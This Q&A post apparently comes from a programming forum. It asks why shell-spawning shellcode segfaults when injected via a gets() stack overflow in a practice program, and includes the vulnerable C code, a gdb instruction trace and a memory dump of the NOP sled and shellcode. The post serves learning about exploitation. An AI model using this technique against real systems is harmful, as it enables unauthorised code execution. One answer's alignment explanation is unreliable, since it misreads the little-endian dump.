# Shellcode segfaults after nop sled

Tags: c, security, gdb, stack-overflow, exploit

Basic C program with an obvious buffer overflow:

```
void f(){
    char buf[100];
    gets(buf);
    printf("Hello exploit");
}


int main(){
 f();
 return 0;
}
```

Shellcode for the correct system:
http://www.shell-storm.org/shellcode/files/shellcode-811.php
I've put a NOP sled at the front and the correct return address at the back.

When running the exploit in gdb, I can see that the return address is correctly altered, the execution jumps to my nop sled and continues with the shellcode. I can step through the start of the shellcode, but it segfaults near the end.

```
(gdb) c
Continuing.

Breakpoint 4, 0xbffff710 in ?? ()
1: x/i $pc
=> 0xbffff710:  xor    %eax,%eax
(gdb) stepi
0xbffff712 in ?? ()
1: x/i $pc
=> 0xbffff712:  push   %eax
(gdb) stepi
0xbffff713 in ?? ()
1: x/i $pc
=> 0xbffff713:  push   $0x68732f2f
(gdb) stepi
0xbffff718 in ?? ()
1: x/i $pc
=> 0xbffff718:  push   $0x6e69622f
(gdb) stepi
0xbffff71d in ?? ()
1: x/i $pc
=> 0xbffff71d:  mov    %esp,%ebx
(gdb) stepi
0xbffff71f in ?? ()
1: x/i $pc
=> 0xbffff71f:  mov    %eax,%ecx
(gdb) stepi
0xbffff721 in ?? ()
1: x/i $pc
=> 0xbffff721:  mov    %eax,%edx
(gdb) stepi
0xbffff723 in ?? ()
1: x/i $pc
=> 0xbffff723:  mov    $0x2f,%al
(gdb) stepi
0xbffff725 in ?? ()
1: x/i $pc
=> 0xbffff725:  bound  %ebp,0x6e(%ecx)
(gdb) stepi

Program received signal SIGSEGV, Segmentation fault.
```

The program has an executable stack (`execstack -s vulnerableApp`) and ASLR is off.

So three questions:

- Where does the bound instruction come from? The shellcode from the url doesn't have a bound oppcode
- Why is it segfaulting?
- How can I fix it? (I'd rather understand what's going on here, then trying different shellcodes)

-- Edit
I forgot to mention that I've used this shellcode on the same system to exploit a different binary and it worked.

**UPDATE**

Yes, the shellcode is delivered in its entirety:

```
0xbffff6f6: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff706: 0x90909090  0x90909090  0xc0319090  0x2f2f6850
0xbffff716: 0x2f686873  0x896e6962  0x89c189e3  0xcd0bb0c2
0xbffff726: 0x40c03180  0xf48680cd  0x8400bfff  0x00000804
0xbffff736: 0x00000000  0x44d30000  0x0001b7e4  0xf7d40000
```

You can see the sled, followed by the exploit.

Comment: Are you sure all your injected code is written to memory?

Comment: The op at that address should be 'cd 80 int    $0x80', it'd be interesting to know how that compares to 'bound  %ebp,0x6e(%ecx)'

Comment: The shellcode is there. I've added a printout.

Answer (score 2, accepted):

I fixed this by adding a small NOP sled after the shellcode. Since the shellcode was added to the stack at the end of the buffer, and it pushes some things to the stack itself, it was overwriting its own code.

Answer (score 0):

Had the same problem here.
Point of the trouble is, that your NOP sled isn't a multiple of 4/8 byte.
The instruction "0xc0319090  0x2f2f6850" (NOPs and instructions mixed up) leads to a shift (here a 2 byte shift) in the shellcode until at some point the CPU isn't able to interpret the shellcode, because of an incomplete instruction --> Segmentation Fault

Comment: That may have also been a problem. The main problem was definitely that I was overwriting my shellcode (as I saw it change in GDB), and by fixing that issue I probably solved this future problem as well.